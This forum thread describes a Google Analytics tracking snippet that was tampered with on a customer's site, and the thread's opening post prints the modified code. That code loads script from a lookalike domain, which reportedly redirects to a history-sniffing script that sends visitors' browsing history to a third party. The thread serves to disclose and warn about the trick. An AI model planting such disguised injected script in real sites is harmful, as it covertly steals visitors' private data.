

Modified Google Analytics XSS - holdenc

I found this on a customer site (for example) customersite.com. Looks like Google Analytics tracking code, right?

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://customersite.com" : "http://www.customersite.com");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
var test = unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E");
</script>
<script type="text/javascript">
try {
    var pageTracker = _gat._getTracker("UA-xxxxxx-x");
    pageTracker._trackPageview();
} catch(err) {}
</script>

Somehow my customer had been tricked into changing:

"https://" : "http://"

to:

"https://customersite.com" : "http://www.customersite.com"

This makes the JavaScript called from http://www.customersite.comgoogle-analytics.com, which then redirects to dxwebhost.com/l.js for the JavaScript. It looks like the JavaScript file then uses a CSS vulnerability to look up the user's browser history and asynchronously sends it off to the third-party site.

So if you happen to be looking at your network traffic and notice your browser history is being sent off to a strange site, check out the Google Analytics tracking code.
======
e1ven
Very clever, I wouldn't have noticed that just reading through the code.
Whoever the thieves are, that mod was a nice hack.

------
storborg
What do you suppose people might do with this sort of data if they weren't in
a legitimate position to monetize it (e.g. through an ad network)?

This code will sit there probing your cache over and over, it seems to just
check a huge list of domains in order of Alexa rank.

------
woodall
I just found a way to automate XSS in Google PlayGround.

[http://christopherwoodall.com/blog/?x=entry:entry100814-0521...](http://christopherwoodall.com/blog/?x=entry:entry100814-052131;comments:1)

